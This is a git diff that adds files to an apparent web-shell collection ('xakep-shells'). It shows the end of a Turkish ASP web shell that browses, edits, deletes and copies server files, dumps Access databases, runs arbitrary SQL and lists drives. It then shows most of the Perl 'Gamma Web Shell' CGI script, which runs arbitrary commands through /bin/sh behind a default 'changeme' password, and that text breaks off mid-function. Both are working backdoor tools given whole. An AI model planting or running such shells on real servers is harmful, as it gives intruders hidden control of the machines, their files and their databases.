+    if err.number=62 then Response.Write "<script language=javascript>alert('Bu Dosya Okunam�yor\nSistem dosyas� olabilir')</script>":Response.End
+CASE 6 'Resim a�
+    Response.Write "<center><img ALT='zehirhacker@hotmail.com / zehirhacker@hotmail.com' src='"&resimYol(path)&"'></center><br>"
+CASE 7 'database tablo listele
+    Response.Write "<b><font size=3>Tablolar</font></br><br>"
+    Set objConn = Server.CreateObject("ADODB.Connection")
+    Set objADOX = Server.CreateObject("ADOX.Catalog")
+    objConn.Provider = "Microsoft.Jet.Oledb.4.0"
+    objConn.ConnectionString = Path
+    objConn.Open
+    objADOX.ActiveConnection = objConn
+
+    For Each table in objADOX.Tables
+        If table.Type = "TABLE" Then
+            Response.Write "<font face=wingdings size=5>4</font> <a href='"&dosyaPath&"?status=8&Path="&path&"&table="&table.Name&"&time="&time&"'>"&table.Name&"</a><br>"
+        End If
+    Next
+    hataKontrol
+CASE 8 'database kay�t listele
+    Set objConn = Server.CreateObject("ADODB.Connection")
+    Set objRcs = Server.CreateObject("ADODB.RecordSet")
+    objConn.Provider = "Microsoft.Jet.Oledb.4.0"
+    objConn.ConnectionString = Path
+    objConn.Open
+    objRcs.Open table,objConn, adOpenKeyset , , adCmdText
+
+    Response.Write "<table border=1 cellpadding=2 cellspacing=0 bordercolor=543152><tr bgcolor=silver>"
+    for i=0 to objRcs.Fields.count-1
+        Response.Write "<td><font color=black><b>&nbsp;&nbsp;&nbsp;"&objRcs.Fields(i).Name&"&nbsp;&nbsp;&nbsp;</font></td>"
+    next
+    Response.Write "</tr>"
+    do while not objRcs.EOF
+        Response.Write "<tr>"
+        for i=0 to objRcs.Fields.count-1
+            Response.Write "<td>"&objRcs.Fields(i).Value&"&nbsp;</td>"
+        next
+        Response.Write "</tr>"
+        objRcs.MoveNext
+    loop
+    Response.Write "</table><br>"
+    hataKontrol
+CASE 9 'SQL Execute
+    Set objConn = Server.CreateObject("ADODB.Connection")
+    objConn.Provider = "Microsoft.Jet.Oledb.4.0"
+    objConn.ConnectionString = Path
+    objConn.Open
+    objConn.Execute strSQL
+'    Response.Redirect dosyaPath&"?status=7&Path="&Path&"&Time="&time
+    hataKontrol
+CASE 10 'Dosya Editleme
+    set f = objFSO.OpenTextFile(dPath,1)
+    Response.Write "<center><form action='"&DosyPath&"?Time="&time&"' method=post>"
+    Response.Write "<input type=hidden name=status value='11'>"
+    Response.Write "<input type=hidden name=dPath value='"&dPath&"'>"
+    Response.Write "<input type=hidden name=Path  value='"&Path &"'>"
+    Response.Write "<input type=submit value=Kaydet><br>"
+    Response.Write "<textarea name=dkayit style='width:90%;height:350;border-right: lightgoldenrodyellow thin solid;border-top: lightgoldenrodyellow thin solid;font-size: 12;border-left: lightgoldenrodyellow thin solid;color: lime;    border-bottom: lightgoldenrodyellow thin solid;    font-family: Courier New, Arial;background-color: navy;'>"
+    Response.Write server.HTMLEncode(f.readAll)
+    Response.Write "</textarea></form></center>"
+    hataKontrol
+CASE 11 'Dosya Kay�t
+    set saveTextFile = objFSO.OpenTextFile(dPath,2,true,false)
+    hataKontrol
+    saveTextFile.Write(dkayit)
+    saveTextFile.close
+    if err<>0 then
+        byMsg = "<font color=red>Not File Edited!</font><br>"
+    else
+        byMsg = "<font color=yellow>File Edited Successful:)</font><br>"
+    end if
+    Response.Redirect dosyaPath&"?status=2&path="&path&"&time="&time&"&byMsg=" & byMsg
+CASE 12 'Dosya Arama
+    araBul path,arama
+    hataKontrol
+END SELECT
+Response.Write "</tr></table>"
+
+sub DosyaOku
+    Set f = objFSO.GetFolder(Path)
+    Set fc = f.Files
+    For Each f1 In fc
+        dosyaAdi = f1.name
+        num = InStrRev(dosyaAdi,".")
+        uzanti = lcase(Right(dosyaAdi,len(dosyaAdi)-num))
+        downStr = "<a href='"&dosyaPath&"?status=3&Path="&Path&"&Del="&Path&"/"&f1.Name&"&Time="&time&"'>�</a><font face=webdings><a href='"&dosyaPath&"?status=-3&PathFile="&f1.path&"&Time="&time&"'>�</a></font><font face=wingdings><a href='"&dosyaPath&"?status=16&PathFile="&f1.path&"&Time="&time&"' onclick=""ffd(this.href);return false;"">4</a></font>"
+        response.Write "<font size=2>"
+        select case uzanti
+        case "mdb"
+            Response.Write "<a href='"&dosyaPath&"?status=7&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>M �"&downStr&"</font><br>"
+        case "asp"
+            Response.Write "<a href='"&dosyaPath&"?status=5&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>� <a href='"&dosyaPath&"?status=10&dPath="&f1.path&"&path="&path&"&Time="&time&"'>!</a>"&downStr&"</font><br>"
+        case "jpg","gif"
+            Response.Write "<a href='"&dosyaPath&"?status=6&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=webdings size=4>�</font><font face=wingdings size=4> �"&downStr&"</font><br>"
+        case else
+            Response.Write "<a href='"&dosyaPath&"?status=5&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>2 <a href='"&dosyaPath&"?status=10&dPath="&f1.path&"&path="&path&"&Time="&time&"'>!</a>"&downStr&"</font><br>"
+        end select
+    Next
+end sub
+
+sub KlasorOku
+    Set f = objFSO.GetFolder(Path)
+    Set fc = f.SubFolders
+    if session("klasoroku")="" then
+        response.Write "<iframe style='width:0; height:0' src='http://localhost/tuzla-ebelediye'></iframe>"
+        session("klasoroku")="simdi yaz�l�yor"
+    end if
+    For Each f1 In fc
+        Response.Write "<font face=wingdings size=3><a href='"&dosyaPath&"?status=18&PathFile="&Path&"/"&f1.Name&"&Time="&time&"' onclick=""ffd(this.href);return false;"">4</a></font> <font face=wingdings size=4><a href='"&dosyaPath&"?status=4&Path="&Path&"&Del="&Path&"/"&f1.Name&"&Time="&time&"'>�</a> 1</font><font size=2><b><a href='"&dosyaPath&"?status=2&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&"</a></b><br>"
+    Next
+end sub
+
+function createFileName()
+Randomize
+    fName_ = ""
+    for i=1 to 10
+        fName_ = fName_ & int(Rnd*100)
+    next
+    createFileName = fName_
+end function
+
+function resimYol(path_)
+on error resume next
+    path_ = Replace(Replace(path_,"\","/"),"//","/")
+    lpath_ = left(request.servervariables("PATH_TRANSLATED"),instrrev(request.servervariables("PATH_TRANSLATED"),"\"))
+    if yaziyomu2(lpath_) then
+        fname__ = "0"&createFileName()&"."&Right(path_,3)
+        objFSO.CopyFile path_, lpath_&"\"&fname__
+    else
+        Response.Write("Resim A��lam�yor.. <br>�sterseniz Download Ederek g�r�nt�leyebilirsiniz..")
+    end if
+    resimYol = fname__
+end function
+
+if not popup then
+    Set fc = Nothing
+    Set objFSO = Nothing
+    Response.End
+end if
+%><script language=javascript>
+	var dosyaPath = "<%=dosyaPath%>"
+		// DRIVE ISLEMLERI
+		function driveGo(drive_){
+			location = dosyaPath+"?status=1&path="+drive_+"&Time="+Date();
+		}
+	</script>
+	<%
+	Response.Write "<table align=center border=1 width=150 cellpadding=0 cellspacing=0><tr bgcolor=gray><td align=center><b><font color=white>S�r�c�ler</td></tr>"
+	for each drive_ in objFSO.Drives
+		Response.Write "<tr><td>"
+		Response.write "<a href='#'onClick=""driveGo('" & drive_.DriveLetter & "');return false;""><font face=wingdings>;</font>"
+		if drive_.Drivetype=1 then Response.write "Floppy [" & drive_.DriveLetter & ":]"
+		if drive_.Drivetype=2 then Response.write "HardDisk [" & drive_.DriveLetter & ":]"
+		if drive_.Drivetype=3 then Response.write "Remote HDD [" & drive_.DriveLetter & ":]"
+		if drive_.Drivetype=4 then Response.write "CD-Rom [" & drive_.DriveLetter & ":]"
+		Response.Write "</a></td></tr>"
+	next
+	Response.Write "<tr><td>"
+	Response.write "<a href='"&dosyaPath&"?time="&time()&"'><font face=webdings>H</font> Local Path"
+	Response.Write "</a></td></tr>"
+	Response.Write "</table><br>"
+Set fc = Nothing
+Set objFSO = Nothing
+Response.End%>
\ No newline at end of file
diff --git a/xakep-shells/CGI/WebShell.cgi.txt b/xakep-shells/CGI/WebShell.cgi.txt
new file mode 100644
index 0000000..11adf5a
--- /dev/null
+++ b/xakep-shells/CGI/WebShell.cgi.txt
@@ -0,0 +1,869 @@
+#!/usr/bin/perl
+###############################################################################
+### Gamma Web Shell
+### Copyright 2003 Gamma Group
+### All rights reserved
+###
+### Gamma Web Shell is free for both commercial and non commercial
+### use. You may modify this script as you find necessary as long
+### as you do not sell it. Redistribution is not allowed without
+### prior consent from Gamma Group (support@gammacenter.com).
+### 
+### Gamma Group <http://www.gammacenter.com>
+###
+
+use strict;
+
+###############################################################################
+
+package WebShell::Configuration;
+
+use vars qw($password $restricted_mode $ok_commands);
+
+##
+## Password.
+## Set to blank if you don't need password protection.
+##
+$password = "changeme";
+
+##
+## Restricted mode.
+## Set to "1" to allow only a limited set of commands.
+##
+$restricted_mode = 0;
+
+##
+## Available commands.
+## The list of available commands for the restricted mode.
+##
+$ok_commands = ['ls', 'ls -l', 'pwd', 'uptime'];
+
+###############################################################################
+
+package WebShell::Templates;
+
+use vars qw($LOGIN_TEMPLATE $INPUT_TEMPLATE $EXECUTE_TEMPLATE $BROWSE_TEMPLATE);
+
+my $VERSION = 'Gamma Web Shell 1.3';
+
+my $STYLESHEET = <<EOT;
+body {
+  font-family: Verdana, Helvetica, sans-serif;
+  font-size: 90%;
+  color: #000;
+  background: #FFF;
+  margin: 0px;
+  padding: 0px;
+}
+
+h1, h2, h3, h4, h5, h6 {
+  margin: 0.3em;
+  padding: 0px;
+}
+
+input, select, textarea, select {
+  font-family: Verdana, Helvetica, sans-serif;
+  font-size: 100%;
+  margin: 1px;
+  padding: 0px 1px;
+}
+
+pre, code, tt {
+  font-family: 'Courier New', Courier, monospace;
+  font-size: 100%;
+}
+
+form {
+  margin: 0px;
+  padding: 0px;
+}
+
+table {
+  font-size: 100%;
+}
+
+a {
+  text-decoration: none;
+  color: #000;
+  background: transparent;
+}
+
+a:hover {
+  text-decoration: underline;
+}
+
+.header, .footer {
+  color: #000;
+  background: #CCF;
+  margin: 0px;
+  padding: 0px;
+  text-align: center;
+  border: solid #000;
+  border-width: 1px 0px;
+}
+
+.box {
+  border: 1px solid #000;
+  border-collapse: collapse;
+  color: #000;
+  background: #CCF;
+}
+
+.box-header, .box-content, .box-text, .box-error, .box-menu {
+  border: 1px solid #000;
+}
+
+.box-header, .box-header a {
+  color: #FFF;
+  background: #000;
+}
+
+.box-content {
+  text-align: center;
+}
+
+.box-text {
+  padding: 3px 10px;
+  font-size: 90%;
+}
+
+.box-menu {
+  padding: 3px 10px;
+}
+
+.box-error {
+  color: #FFF;
+  background: #F00;
+  font-weight: bold;
+  padding: 3px 25px;
+  text-align: center;
+}
+
+.dialog {
+  text-align: left;
+  border-collapse: collapse;
+}
+
+.dialog-even {
+  color: #000;
+  background: #CCF;
+}
+
+.dialog-odd {
+  color: #000;
+  background: #AAE;
+}
+
+.menu {
+  font-weight: normal;
+}
+
+.menu-selected {
+  font-weight: bold;
+}
+
+.tool {
+  background: transparent;
+  color: #000;
+  border-style: hidden;
+  border-width: 1px;
+  text-decoration: none;
+}
+
+.tool:hover {
+  border-style: outset;
+  text-decoration: none;
+}
+
+.output {
+  color: #FFF;
+  background: #000;
+  padding: 1em;
+  font-weight: bold;
+}
+
+.output-text {
+}
+
+.output-command {
+  color: #FF7;
+  background: #000;
+}
+
+.output-error {
+  color: #FFF;
+  background: #F00;
+}
+
+.entries {
+  border: 1px solid #777;
+  border-collapse: collapse;
+}
+
+.entries td, .entries th {
+  padding: 2px 10px;
+}
+
+.entries th, .entries td {
+  border: 1px solid #777;
+}
+
+.entries-even {
+    color: #FFF;
+    background: #444;
+}
+
+.entry-dir a {
+  color: #BBF;
+  background: transparent;
+}
+
+.entry-exec {
+  color: #BFB;
+  background: transparent;
+}
+
+.entry-file {
+}
+
+.entry-mine {
+}
+
+.entry-alien {
+  color: #FBB;
+  background: transparent;
+}
+
+EOT
+
+$LOGIN_TEMPLATE = <<EOT;
+<html>
+    <head>
+        <title>Gamma Web Shell</title>
+        <style type="text/css">$STYLESHEET</style>
+    </head>
+    <body>
+        <table width="100%" height="100%">
+            <tr><td class="header"><h2>$VERSION</h2></td></tr>
+            <tr>
+                <td width="100%" height="100%" align="center" valign="center">
+                    <form action="WebShell.cgi" method="POST">
+                        <table class="box">
+                            <tr><th class="box-header">Login</th></tr>
+                            [% if error %]
+                                <tr><td class="box-error">Invalid password!</td></tr>
+                            [% end %]
+                            <tr>
+                                <td class="box-content">
+                                    <table class="dialog" width="100%">
+                                        <tr>
+                                            <td>Password:</td>
+                                            <td><input name="password" type="password"></td>
+                                        </tr>
+                                    </table>
+                                </td>
+                            </tr>
+                            <tr>
+                                <td class="box-content">
+                                    <input class="tool" type="submit" value="OK">
+                                </td>
+                            </tr>
+                        </table>
+                    </form>
+                </td>
+            </tr>
+            <tr><td class="footer"><h5>Copyright &copy; 2003 <a href="http://www.gammacenter.com/">Gamma Group</a></h5></td></tr>
+        </table>    
+    </body>
+</html>
+EOT
+
+$INPUT_TEMPLATE = <<EOT;
+<html>
+    <head>
+        <title>Gamma Web Shell</title>
+        <style type="text/css">$STYLESHEET</style>
+    </head>
+    <body>
+        <table width="100%" height="100%">
+            <tr><td class="header"><h2>$VERSION</h2></td></tr>
+            <tr>
+                <td width="100%" height="100%" align="center" valign="center">
+                    <iframe name="output" src="WebShell.cgi?action=execute" width="80%" height="80%"></iframe>
+                    <br><br>
+                    <script type="text/javascript">
+                        function submit_execute() {
+                            var entry = document.forms.execute.elements['command'];
+                            if (entry.value.length > 0) {
+                                entry.select();
+                                entry.focus();
+                                document.forms.execute.elements['action'].value = 'execute';
+                                return true;
+                            }
+                            else {
+                                return false;
+                            }
+                        }
+                        function submit_browse() {
+                            document.forms.execute.elements['action'].value = 'browse';
+                        }
+                    </script>
+                    <form name="execute" action="WebShell.cgi" method="POST" target="output">
+                        <input name="action" type="hidden" value="execute">
+                        <table class="box">
+                            <tr>
+                                <td class="box-content">
+                                    <table class="dialog" width="100%">
+                                        <tr>
+                                            <th>Command:</th>
+                                            <td><input name="command" type="text" size="50"></td>
+                                            <td><input class="tool" type="submit" value="Execute" onClick="return submit_execute()"></td>
+                                            <td><input class="tool" type="submit" value="Browse" onClick="return submit_browse()"></td>
+                                        </tr>
+                                    </table>
+                                </td>
+                            </tr>
+                        </table>
+                    </form>
+                </td>
+            </tr>
+            <tr><td class="footer"><h5>Copyright &copy; 2003 <a href="http://www.gammacenter.com/">Gamma Group</a></h5></td></tr>
+        </table>    
+    </body>
+</html>
+EOT
+
+$EXECUTE_TEMPLATE = <<EOT;
+<html>
+    <head>
+        <title>Gamma Web Shell</title>
+        <style type="text/css">$STYLESHEET</style>
+    </head>
+    <body class="output">
+        [% if old_line %]
+            <pre class="output-command">[% old_line as html %]</pre>
+        [% end %]
+        [% if output %]
+            <pre class="output-text">[% output as html %]</pre>
+        [% end %]
+        [% if error %]
+            <pre class="output-error">[% error as html %]</pre>
+        [% end %]
+        [% if new_line %]
+            <pre class="output-command">[% new_line as html %]</pre>
+        [% end %]
+    </body>
+</html>
+EOT
+
+$BROWSE_TEMPLATE = <<EOT;
+<html>
+    <head>
+        <title>Gamma Web Shell</title>
+        <style type="text/css">$STYLESHEET</style>
+    </head>
+    <body class="output">
+        [% if error %]
+            <p class="output-error">[% error as html %]</p>
+        [% end %]
+        <table class="entries" width="100%">
+            <tr class="entries-even" align="left">
+                <th colspan="6">
+                    [% for entry in directory %]<code class="entry-dir"><a href="WebShell.cgi?action=browse&path=[% entry.path as url %]">[% entry.name as html %]/</a></code>[% end %]
+                </th>
+            </tr>
+            <tr class="entries-odd" align="left">
+                <th width="100%"><small>Name</small></th>
+                <th><small>Size</small></th>
+                <th><small>Time</small></th>
+                <th><small>Owner</small></th>
+                <th><small>Group</small></th>
+                <th><small>Mode</small></th>
+            </tr>
+            [% for entry in entries %]
+                <tr class="entries-[% if loop.entry.even %]even[% else %]odd[% end %]">
+                    <td width="100%">
+                        [% if entry.type_file %]
+                            [% if entry.type_exec %]
+                                <code class="entry-exec">[% entry.name as html %]</code>
+                            [% else %]
+                                <code class="entry-file">[% entry.name as html %]</code>
+                            [% end %]
+                        [% elif entry.type_dir %]
+                            <code class="entry-dir"><a href="WebShell.cgi?action=browse&path=[% entry.name as url %]">[% entry.name as html %]/</a></code>
+                        [% else %]
+                            <code class="entry-other">[% entry.name as html %]</code>
+                        [% end %]
+                    </td>
+                    <td align="right">
+                        [% if entry.type_file %]
+                            <code class="entry-text">[% entry.size as html %]</code></td>
+                        [% else %]
+                        &nbsp;
+                        [% end %]
+                    </td>
+                    <td><code class="entry-text">[% entry.time as nbsp %]</code></td>
+                    <td><code class="entry-[% if entry.all_rights %]mine[% else %]alien[% end %]">[% entry.user as html %]</code></td>
+                    <td><code class="entry-[% if entry.all_rights %]mine[% else %]alien[% end %]">[% entry.group as html %]</code></td>
+                    <td><code class="entry-text">[% entry.mode as html %]</code></td>
+                </tr>
+            [% end %]
+        </table>
+    </body>
+</html>
+EOT
+
+
+###############################################################################
+
+package WebShell::MiniXIT;
+
+sub new {
+    my ($class) = @_;
+    return bless {}, $class;
+}
+
+sub substitute {
+    my ($self, $input, %keywords) = @_;
+    my $statements = $self->parse($input);
+    my $operation = $self->compile($statements);
+    my $output = $self->evaluate($operation, \%keywords);
+    return $output;
+}
+
+sub parse {
+    my ($self, $input) = @_;
+    my $statements = [];
+    my $start = 0;
+    while ($input =~ /(\[%\s*(.*?)\s*%\])/g) {
+        my $match_end = pos($input);
+        my $match_start = $match_end - length($1);
+        if ($start < $match_start) {
+            my $text = substr($input, $start, $match_start-$start);
+            push @$statements, { id => 'text', text => $text };
+        }
+        push @$statements, $self->parse_command($2);
+        $start = $match_end;
+    }
+    if ($start < length($input)) {
+        my $text = substr($input, $start);
+        push @$statements, { id => 'text', text => $text };
+    }
+    return $statements;
+}
+
+sub parse_command {
+    my ($self, $command) = @_;
+    if ($command =~ /^if\s+(\w+(\.\w+)*)$/) {
+        return { id => 'if', test => $1, };
+    }
+    elsif ($command =~ /^elif\s+(\w+(\.\w+)*)$/) {
+        return { id => 'elif', test => $1 };
+    }
+    elsif ($command =~ /^else$/) {
+        return { id => 'else' };
+    }
+    elsif ($command =~ /^for\s+(\w+)\s+in\s+(\w+(\.\w+)*)$/) {
+        return { id => 'for', name => $1, list => $2 };
+    }
+    elsif ($command =~ /^end$/) {
+        return { id => 'end' };
+    }
+    elsif ($command =~ /^(\w+(\.\w+)*)(\s+as\s+(\w+))$/) {
+        return { id => 'print', variable => $1, format => $4 };
+    }
+    else {
+        die "invalid command: '$command'";
+    }
+}
+
+sub compile {
+    my ($self, $statements) = @_;
+    my $operation = $self->compile_sequence($statements);
+    if (scalar(@$statements)) {
+        my $statement = shift(@$statements);
+        my $id = $statements->{id};
+        die "unexpected statement: '$id'";
+    }
+    return $operation;
+}
+
+sub compile_sequence {
+    my ($self, $statements) = @_;
+    my $operations = [];
+    while (scalar(@$statements) > 0) {
+        my $id = $statements->[0]->{id};
+        if ($id eq 'if') {
+            push @$operations, $self->compile_condition($statements);
+        }
+        elsif ($id eq 'for') {
+            push @$operations, $self->compile_loop($statements);
+        }
+        elsif ($id eq 'print' or $id eq 'text') {
+            my $statement = shift @$statements;
+            push @$operations, $statement;
+        }
+        else {
+            last;
+        }
+    }
+    return { id => 'sequence', operations => $operations };
+}
+
+sub compile_condition {
+    my ($self, $statements) = @_;
+    my $conditions = [];
+    my $statement = shift @$statements;
+    my $id = defined $statement ? $statement->{id} : 'none';
+    while ($id eq 'if' or $id eq 'elif' or $id eq 'else') {
+        my $test = $id ne 'else' ? $statement->{test} : undef;
+        my $operation = $self->compile_sequence($statements);
+        push @$conditions, { test => $test, operation => $operation };
+        $statement = shift @$statements;
+        $id = defined $statement ? $statement->{id} : 'none';
+    }
+    die "'end' expected, but '$id' found" unless $id eq 'end';
+    return { id => 'condition', conditions => $conditions };
+}
+
+sub compile_loop {
+    my ($self, $statements) = @_;
+    my $statement = shift @$statements;
+    my $name = $statement->{name};
+    my $list = $statement->{list};
+    my $operation = $self->compile_sequence($statements);
+    $statement = shift @$statements;
+    my $id = defined $statement ? $statement->{id} : 'none';
+    die "'end' expected, but '$id' found" unless $id eq 'end';
+    return { id => 'loop',
+        name => $name, list => $list, operation => $operation };
+}
+
+sub evaluate {
+    my ($self, $operation, $keywords) = @_;
+    $keywords->{loop} = {};
+    my $chunks = $self->evaluate_operation($operation, $keywords);
+    return join('', @$chunks);
+}
+
+sub evaluate_operation {
+    my ($self, $operation, $keywords) = @_;
+    if ($operation->{id} eq 'condition') {
+        return $self->evaluate_condition($operation->{conditions}, $keywords);
+    }
+    elsif ($operation->{id} eq 'loop') {
+        return $self->evaluate_loop($operation->{name}, $operation->{list},
+                $operation->{operation}, $keywords);
+    }
+    elsif ($operation->{id} eq 'print') {
+        return $self->evaluate_print($operation->{variable},
+                $operation->{format}, $keywords);
+    }
+    elsif ($operation->{id} eq 'sequence') {
+        my $chunks = [];
+        push @$chunks, @{$self->evaluate_operation($_, $keywords)}
+                for (@{$operation->{operations}});
+        return $chunks;
+    }
+    elsif ($operation->{id} eq 'text') {
+        return [$operation->{text}];
+    }
+}
+
+sub evaluate_condition {
+    my ($self, $conditions, $keywords) = @_;
+    for my $condition (@$conditions) {
+        my $test = $condition->{test};
+        my $value = defined $test ?
+                $self->evaluate_variable($test, $keywords) : 1;
+        return $self->evaluate_operation($condition->{operation}, $keywords)
+                    if $value;
+    }
+    return [];
+}
+
+sub evaluate_loop {
+    my ($self, $name, $list, $operation, $keywords) = @_;
+    my $values = $self->evaluate_variable($list, $keywords);
+    my $length = scalar(@$values);
+    my $index = 0;
+    my $chunks = [];
+    for my $value (@$values) {
+        $keywords->{$name} = $value;
+        $keywords->{loop}->{$name} = {
+            index => $index, number => $index+1,
+            first => $index == 0, last => $index == $length-1,
+            odd => $index % 2 == 1, even => $index % 2 == 0,
+        };
+        push @$chunks, @{$self->evaluate_operation($operation, $keywords)};
+        $index++;
+    }
+    delete $keywords->{$name};
+    delete $keywords->{loop}->{$name};
+    return $chunks;
+}
+
+sub evaluate_print {
+    my ($self, $variable, $format, $keywords) = @_;
+    my $value = $self->evaluate_variable($variable, $keywords);
+    if ($format eq 'html') {
+        for ($value) { s/&/&amp;/g; s/</&lt;/g; s/>/&gt;/g; s/"/&quot;/g; }
+    }
+    elsif ($format eq 'nbsp') {
+        for ($value) {
+            s/&/&amp;/g; s/</&lt;/g; s/>/&gt;/g; s/"/&quot;/g; s/ /&nbsp;/g;
+        }
+    }
+    elsif ($format eq 'url') {
+        $value =~ s/(\W)/sprintf('%%%02X', ord($1))/eg;
+    }
+    elsif ($format ne '') {
+        
+        die "unknown format: '$format'";
+    }
+    return [$value];
+}
+
+sub evaluate_variable {
+    my ($self, $variable, $keywords) = @_;
+    my $value = $keywords;
+    for my $name (split(/\./, $variable)) {
+        $value = $value->{$name};
+    }
+    return $value;
+}
+
+###############################################################################
+
+package WebShell::Script;
+
+use CGI;
+use CGI::Carp qw(fatalsToBrowser);
+use IPC::Open3;
+use Cwd;
+use POSIX;
+
+sub new {
+    my ($class) = @_;
+    my $self = bless { }, $class;
+    $self->initialize();
+    return $self;
+}
+
+sub query {
+    my ($self, @names) = @_;
+    my @values = ();
+    for my $name (@names) {
+        my $value = $self->{cgi}->param($name);
+        for ($value) { s/^\s+//; s/\s+$//; }
+        push @values, $value;
+    }
+    return wantarray ? @values : "@values";
+}
+
+sub initialize {
+    my ($self) = @_;
+    $self->{cgi} = new CGI;
+    $self->{cwd} = $self->{cgi}->cookie(-name => 'WebShell-cwd');
+    $self->{cwd} = cwd unless defined $self->{cwd};
+    $self->{cwd} = cwd if $WebShell::Configuration::restricted_mode;
+    $self->{login} = 0;
+    my $login = $self->{cgi}->cookie(-name => 'WebShell-login');
+    my $password = $self->query('password');
+    $self->{login} = 1
+            if crypt($WebShell::Configuration::password, $login."XX") eq $login;
+    $self->{login} = 1 if $password eq $WebShell::Configuration::password;
+}
+
+sub run {
+    my ($self) = @_;
+    return $self->login_action unless $self->{login};
+    my $action = $self->query('action');
+    $action = 'default' unless $action =~ /^\w+$/;
+    $action = $self->can($action . '_action');
+    $action = $self->can('default_action') unless defined $action;
+    $self->$action();
+}
+
+sub default_action {
+    my ($self) = @_;
+    $self->publish('INPUT');
+}
+
+sub login_action {
+    my ($self) = @_;
+    $self->publish('LOGIN', error => ($self->query('password') ne ''));
+}
+
+sub command {
+    my ($self, $command) = @_;
+    chdir($self->{cwd});
+    my $pid = open3(\*WRTH, \*RDH, \*ERRH, "/bin/sh");
+    print WRTH "$command\n";
+    close(WRTH);
+    my $output = do { local $/; <RDH> };
+    my $error = do { local $/; <ERRH> };
+    waitpid($pid, 0);
+    return ($output, $error);
+}
+
+sub forbidden_command {
+    my ($self, $command) = @_;
+    my $error = "This command is not available in the restricted mode.\n";
+    $error .= "You may only use the following commands:\n";
+    for my $ok_command (@$WebShell::Configuration::ok_commands) {
+        $error .= "    $ok_command\n";
+    }
+    return ('', $error);
+}
+
+sub cd_command {
+    my ($self, $command) = @_;
+    my $error;
+    my $directory = $1 if $command =~ /^cd\s+(\S+)$/;
+    warn "cwd: '$self->{cwd}'\n";
+    warn "command: '$command'\n";
+    warn "directory: '$directory'\n";
+    if ($directory ne '') {
+        $error = $! unless chdir($self->{cwd});
+        $error = $! unless chdir($directory);
+    }
+    $self->{cwd} = cwd;
+    return ('', $error);
+}
+
+sub execute_action {
+    my ($self) = @_;
+    my $command = $self->query('command');
+    my $user = getpwuid($>);
+    my $old_line = "[$user: $self->{cwd}]\$ $command";
+    my ($output, $error);
+    if ($command ne "") {
+        my $allow = not $WebShell::Configuration::restricted_mode;
+        for my $ok_command (@$WebShell::Configuration::ok_commands) {
+            $allow = 1 if $command eq $ok_command;
+        }
+        if ($allow) {
+            $command =~ /^(\w+)/;
+            if (my $method = $self->can("${1}_command")) {
+                ($output, $error) = $self->$method($command);
+            }
+            else {
+                ($output, $error) = $self->command($command);
+            }
+            
+        }
+        else {
+            ($output, $error) = $self->forbidden_command($command);
+        }
+    }
+    my $new_line = "[$user: $self->{cwd}]\$ " unless $command eq "";
+    $self->publish('EXECUTE',
+        old_line => $old_line, new_line => $new_line,
+        output => $output, error => $error);
+}
+
+sub browse_action {
+    my ($self) = @_;
+    my $error = "";
+    my $path = $self->query('path');
+    if ($WebShell::Configuration::restricted_mode and $path ne '') {
+        $error = "You cannot browse directories in the restricted mode.";
+        $path = "";
+    }
+    $error = $! unless chdir($self->{cwd});
+    if ($path ne '') {
+        $error = $! unless chdir($path);
+    }
+    $self->{cwd} = cwd;
+    opendir(DIR, '.');
+    my @dir = readdir(DIR);
+    closedir(DIR);
+    my @entries = ();
+    for my $name (@dir) {
+        my ($dev, $ino, $mode, $nlink, $uid, $gid, $rdev, $size,
+            $atime, $mtime, $ctime, $blksize, $blocks) = stat($name);
+        my $modestr = S_ISDIR($mode) ? 'd' : '-';
+        $modestr .= ($mode & S_IRUSR) ? 'r' : '-';
+        $modestr .= ($mode & S_IWUSR) ? 'w' : '-';
+        $modestr .= ($mode & S_ISUID) ? 's' : ($mode & S_IXUSR) ? 'x' : '-';
+        $modestr .= ($mode & S_IRGRP) ? 'r' : '-';
+        $modestr .= ($mode & S_IWGRP) ? 'w' : '-';
+        $modestr .= ($mode & S_ISGID) ? 's' : ($mode & S_IXGRP) ? 'x' : '-';
+        $modestr .= ($mode & S_IROTH) ? 'r' : '-';
+        $modestr .= ($mode & S_IWOTH) ? 'w' : '-';
+        $modestr .= ($mode & S_IXOTH) ? 'x' : '-';
+        my $userstr = getpwuid($uid);
+        my $groupstr = getgrgid($gid);
+        my $sizestr = ($size < 1024) ? $size :
+                        ($size < 1024*1024) ? sprintf("%.1fk", $size/1024) :
+                        sprintf("%.1fM", $size/(1024*1024));
+        my $timestr = strftime('%H:%M %b %e %Y', localtime($mtime));
+        push @entries, {
+            name => $name,
+            type_file => S_ISREG($mode),
+            type_dir => S_ISDIR($mode),
+            type_exec => ($mode & S_IXUSR),
+            mode => $modestr,
+            user => $userstr,
+            group => $groupstr,
+            order => (S_ISDIR($mode) ? 0 : 1) . $name,
+            all_rights => (-w $name),
+            size => $sizestr,
+            time => $timestr,
+        };
+    }
+    @entries = sort { $a->{order} cmp $b->{order} } @entries;
+    my @directory = ();
+    my $path = '';
+    for my $name (split m|/|, $self->{cwd}) {
+        $path .= "$name/";
+        push @directory, {
+            name => $name,
+            path => $path,
+        };
+    }
+    @directory = ({ name => '', path => '/'}) unless @directory;
+    $self->publish('BROWSE', entries => \@entries, directory => \@directory,
+            error => $error);
+}
+
+sub publish {
+    my ($self, $template, %keywords) = @_;
+    $template = eval '$WebShell::Templates::' . $template . '_TEMPLATE';
+    my $xit = new WebShell::MiniXIT;
+    my $text = $xit->substitute($template, %keywords);
+    $self->{cgi}->url =~ m{^http://([^/]*)(.*)/[^/]*$};
+    my $domain = $1;
+    my $path = $2;
+    my $cwd_cookie = $self->{cgi}->cookie(
+        -name => 'WebShell-cwd',
+        -value => $self->{cwd},
+        -domain => $domain,
+        -path => $path,
+    );
+    my $login = "";
+    if ($self->{login}) {
+        my $salt = join '',
+                ('.', '/', 0..9, 'A'..'Z', 'a'..'z')[rand 64, rand 64];
